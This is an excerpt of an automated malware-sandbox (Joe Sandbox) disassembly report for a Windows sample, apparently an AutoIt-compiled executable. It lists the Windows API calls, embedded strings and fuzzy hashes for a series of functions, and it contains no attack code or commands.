                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0065A757
                                                                                                                • _wcscmp.LIBCMT ref: 0065A76B
                                                                                                                  • Part of subcall function 0062362C: _iswctype.LIBCMT ref: 00623634
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                • String ID: %s%u
                                                                                                                • API String ID: 3744389584-679674701
                                                                                                                • Opcode ID: 0a39c019bb888f0060133cdf59fcc9be9346be184de7871d74c7f3bc591aeabd
                                                                                                                • Instruction ID: 1475735d3921c3ac943fadb06a0f7ea52b53dddd9fe7aa6e5869dbf32fdf4249
                                                                                                                • Opcode Fuzzy Hash: 0a39c019bb888f0060133cdf59fcc9be9346be184de7871d74c7f3bc591aeabd
                                                                                                                • Instruction Fuzzy Hash: 9AA1B131204616AFD714DFA0C884BEAB7EAFF48316F044729FD99D2250DB30E959CB92
                                                                                                                APIs
                                                                                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 0065AF18
                                                                                                                • _wcscmp.LIBCMT ref: 0065AF29
                                                                                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 0065AF51
                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 0065AF6E
                                                                                                                • _wcscmp.LIBCMT ref: 0065AF8C
                                                                                                                • _wcsstr.LIBCMT ref: 0065AF9D
                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0065AFD5
                                                                                                                • _wcscmp.LIBCMT ref: 0065AFE5
                                                                                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 0065B00C
                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0065B055
                                                                                                                • _wcscmp.LIBCMT ref: 0065B065
                                                                                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 0065B08D
                                                                                                                • GetWindowRect.USER32(00000004,?), ref: 0065B0F6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                • String ID: @$ThumbnailClass
                                                                                                                • API String ID: 1788623398-1539354611
                                                                                                                • Opcode ID: 78fbf04e8414e36da64765f27f89a6e55375fe0c904729bb15bcf3251bcda7c0
                                                                                                                • Instruction ID: 83a7b27d0c10adc5eec308ad28096ed2ef97d8148ec1a97f19482f6967e1657a
                                                                                                                • Opcode Fuzzy Hash: 78fbf04e8414e36da64765f27f89a6e55375fe0c904729bb15bcf3251bcda7c0
                                                                                                                • Instruction Fuzzy Hash: 6F81C1711082059FDB14DF10C881FAAB7EAEF44316F14956EFD858A291DB34DD89CBA1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                                                                                • DragQueryPoint.SHELL32(?,?), ref: 0068C627
                                                                                                                  • Part of subcall function 0068AB37: ClientToScreen.USER32(?,?), ref: 0068AB60
                                                                                                                  • Part of subcall function 0068AB37: GetWindowRect.USER32(?,?), ref: 0068ABD6
                                                                                                                  • Part of subcall function 0068AB37: PtInRect.USER32(?,?,0068C014), ref: 0068ABE6
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0068C690
                                                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0068C69B
                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0068C6BE
                                                                                                                • _wcscat.LIBCMT ref: 0068C6EE
                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0068C705
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0068C71E
                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0068C735
                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0068C757
                                                                                                                • DragFinish.SHELL32(?), ref: 0068C75E
                                                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0068C851
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbl
                                                                                                                • API String ID: 169749273-3710877546
                                                                                                                • Opcode ID: 54dd794532b554370ef13d4f336128f4b1b80dab6a1a3130d0f151115e7389be
                                                                                                                • Instruction ID: f329c222b3512b8e32934ac414565ee91ea8b058b6630baf230f5970b70ee070
                                                                                                                • Opcode Fuzzy Hash: 54dd794532b554370ef13d4f336128f4b1b80dab6a1a3130d0f151115e7389be
                                                                                                                • Instruction Fuzzy Hash: CA617371148301AFC705EF64CC85DAFBBEAEF89710F100A2EF595931A1DB709949CB66
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wcsnicmp
                                                                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                • API String ID: 1038674560-1810252412
                                                                                                                • Opcode ID: 05f7b95442b7e0d5977705cda39454127c6e025ec3f1c055aab8bb7c1a98492b
                                                                                                                • Instruction ID: 71c875abc38dfde7a008eb5a23b6fcb1673854d873caac7b697d9790abfe485d
                                                                                                                • Opcode Fuzzy Hash: 05f7b95442b7e0d5977705cda39454127c6e025ec3f1c055aab8bb7c1a98492b
                                                                                                                • Instruction Fuzzy Hash: 71319671988209ABDB94FA90ED13EEF7767AF10712F20051DF842711D1EF516F48CA5A
                                                                                                                APIs
                                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00675013
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0067501E
                                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00675029
                                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00675034
                                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 0067503F
                                                                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 0067504A
                                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00675055
                                                                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00675060
                                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 0067506B
                                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00675076
                                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00675081
                                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 0067508C
                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00675097
                                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 006750A2
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 006750AD
                                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 006750B8
                                                                                                                • GetCursorInfo.USER32(?), ref: 006750C8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$Load$Info
                                                                                                                • String ID:
                                                                                                                • API String ID: 2577412497-0
                                                                                                                • Opcode ID: 896869c82d692d489471fb8d79a09d0e23d2b1e8564c490d215abd9c23fce4cb
                                                                                                                • Instruction ID: 91ff080219fc737998132fe3f7f9c34f48bc2b73e7f94d0efe734b43ac630668
                                                                                                                • Opcode Fuzzy Hash: 896869c82d692d489471fb8d79a09d0e23d2b1e8564c490d215abd9c23fce4cb
                                                                                                                • Instruction Fuzzy Hash: B63135B0D483196ADF109FB68C8999FBFE9FF04750F50452AA50DE7280DA786500CFA1
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0068A259
                                                                                                                • DestroyWindow.USER32(?,?), ref: 0068A2D3
                                                                                                                  • Part of subcall function 00607BCC: _memmove.LIBCMT ref: 00607C06
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0068A34D
                                                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0068A36F
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0068A382
                                                                                                                • DestroyWindow.USER32(00000000), ref: 0068A3A4
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00600000,00000000), ref: 0068A3DB
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0068A3F4
                                                                                                                • GetDesktopWindow.USER32 ref: 0068A40D
                                                                                                                • GetWindowRect.USER32(00000000), ref: 0068A414
                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0068A42C
                                                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0068A444
                                                                                                                  • Part of subcall function 006025DB: GetWindowLongW.USER32(?,000000EB), ref: 006025EC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                • String ID: 0$tooltips_class32
                                                                                                                • API String ID: 1297703922-3619404913
                                                                                                                • Opcode ID: a1b1ca8c3a91ac5be1dbe36c64b648b80182c17284d5c2e81cb99cab316cfb63
                                                                                                                • Instruction ID: d9ebf8c130ec4b0627d819d0df6d4f4324aaf2003a8ce855a9465ca12bdb2be0
                                                                                                                • Opcode Fuzzy Hash: a1b1ca8c3a91ac5be1dbe36c64b648b80182c17284d5c2e81cb99cab316cfb63
                                                                                                                • Instruction Fuzzy Hash: C3718E70141205AFEB25DF68CC49FA67BE7FB89300F04461EF985872A0D771E946CB56
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00684424
                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0068446F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharMessageSendUpper
                                                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                • API String ID: 3974292440-4258414348
                                                                                                                • Opcode ID: 9446f8dbe8d59ed7b941571218e7c0fb8230af9c5564cb02f1f50c0db21cb718
                                                                                                                • Instruction ID: 2b659ac29f7da34c11dff269dd935568ee4e9666526547e9cf5ccf4c8e1d9910
                                                                                                                • Opcode Fuzzy Hash: 9446f8dbe8d59ed7b941571218e7c0fb8230af9c5564cb02f1f50c0db21cb718
                                                                                                                • Instruction Fuzzy Hash: E8913A702047119BCB48EF20C451AAEB7E3AF95350F44896CE8965B3A3DB31ED4ACB95
                                                                                                                APIs
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0068B8B4
                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,006891C2), ref: 0068B910
                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0068B949
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0068B98C
                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0068B9C3
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0068B9CF
                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0068B9DF
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?,006891C2), ref: 0068B9EE
                                                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0068BA0B
                                                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0068BA17
                                                                                                                  • Part of subcall function 00622EFD: __wcsicmp_l.LIBCMT ref: 00622F86
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                • String ID: .dll$.exe$.icl
                                                                                                                • API String ID: 1212759294-1154884017
                                                                                                                • Opcode ID: 8e66434268ce12662bfc3d85b5f5e52e2c431babd4330d01834f8123835c855e
                                                                                                                • Instruction ID: 370ef1f5c79ea1df6557ec12c61a44c5dcfd3be07052d2f5a1d0683aecb467a9
                                                                                                                • Opcode Fuzzy Hash: 8e66434268ce12662bfc3d85b5f5e52e2c431babd4330d01834f8123835c855e
                                                                                                                • Instruction Fuzzy Hash: A461EFB1500215BAEF14EF64DC41FFE7BAAEB09711F104619FE11D62D1DB749980DBA0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00609837: __itow.LIBCMT ref: 00609862
                                                                                                                  • Part of subcall function 00609837: __swprintf.LIBCMT ref: 006098AC
                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 0066A3CB
                                                                                                                • GetDriveTypeW.KERNEL32 ref: 0066A418
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0066A460
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0066A497
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0066A4C5
                                                                                                                  • Part of subcall function 00607BCC: _memmove.LIBCMT ref: 00607C06
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                • API String ID: 2698844021-4113822522
                                                                                                                • Opcode ID: 46a45fc395fd0b613b92c7e7578a7d6bd126e38cae8e0019b4fe6a14f028037d
                                                                                                                • Instruction ID: 7ca0b3520520276957255a5504952af95763115e5f87c956557a1f6049acd0e4
                                                                                                                • Opcode Fuzzy Hash: 46a45fc395fd0b613b92c7e7578a7d6bd126e38cae8e0019b4fe6a14f028037d
                                                                                                                • Instruction Fuzzy Hash: 0B515EB15043059FC744EF14C89186BB7EAEF84718F10896DF89A67292DB31ED0ACF56
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0063E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0065F8DF
                                                                                                                • LoadStringW.USER32(00000000,?,0063E029,00000001), ref: 0065F8E8
                                                                                                                  • Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0063E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0065F90A
                                                                                                                • LoadStringW.USER32(00000000,?,0063E029,00000001), ref: 0065F90D
                                                                                                                • __swprintf.LIBCMT ref: 0065F95D
                                                                                                                • __swprintf.LIBCMT ref: 0065F96E
                                                                                                                • _wprintf.LIBCMT ref: 0065FA17
                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0065FA2E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                • API String ID: 984253442-2268648507
                                                                                                                • Opcode ID: e0a940e52d8d72e5b458d2266615318acc3001be190961e50781d0fbb445539f
                                                                                                                • Instruction ID: 369778aa20f666086c4c3f191b9c3db6376f62ec7131cb315a5cfce213800e71
                                                                                                                • Opcode Fuzzy Hash: e0a940e52d8d72e5b458d2266615318acc3001be190961e50781d0fbb445539f
                                                                                                                • Instruction Fuzzy Hash: 09414B7284011DAACF48FBE0DD86DEFB77AAF14301F100469B506721D1EA356F49CB65
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00689207,?,?), ref: 0068BA56
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00689207,?,?,00000000,?), ref: 0068BA6D
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00689207,?,?,00000000,?), ref: 0068BA78
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00689207,?,?,00000000,?), ref: 0068BA85
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0068BA8E
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00689207,?,?,00000000,?), ref: 0068BA9D
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0068BAA6
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00689207,?,?,00000000,?), ref: 0068BAAD
                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00689207,?,?,00000000,?), ref: 0068BABE
                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00692CAC,?), ref: 0068BAD7
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0068BAE7
                                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 0068BB0B
                                                                                                                • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0068BB36
                                                                                                                • DeleteObject.GDI32(00000000), ref: 0068BB5E
                                                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0068BB74
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3840717409-0
                                                                                                                • Opcode ID: 754815e27b638bde5ec201228b3abf08136c87b43af71f8f7821fa3f5afd56ce
                                                                                                                • Instruction ID: 88e927ae9c371c8705197097023770bdaebf7edbcebc117da42c7f1a389b2b9a
                                                                                                                • Opcode Fuzzy Hash: 754815e27b638bde5ec201228b3abf08136c87b43af71f8f7821fa3f5afd56ce
                                                                                                                • Instruction Fuzzy Hash: 7A412975600204FFDB219FA5DC88EAA7BBAFF89711F105268F905D7260DB709E01CB60
                                                                                                                APIs
                                                                                                                • __wsplitpath.LIBCMT ref: 0066DA10
                                                                                                                • _wcscat.LIBCMT ref: 0066DA28
                                                                                                                • _wcscat.LIBCMT ref: 0066DA3A
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0066DA4F
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0066DA63
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 0066DA7B
                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 0066DA95
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0066DAA7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 34673085-438819550
                                                                                                                • Opcode ID: 3a08039e0597f819b0f538d361c0dd8a440700aacac93f74cefb0e67db6a5fd8
                                                                                                                • Instruction ID: 7e91e8a763651f3cc37ac347621469dfe7cf96f6618f2581f0b392d73b402016
                                                                                                                • Opcode Fuzzy Hash: 3a08039e0597f819b0f538d361c0dd8a440700aacac93f74cefb0e67db6a5fd8
                                                                                                                • Instruction Fuzzy Hash: A7816371A04241AFCB64DF64C8449ABB7EAAF89354F188D2EF889CB351D630DD45CB52
                                                                                                                APIs
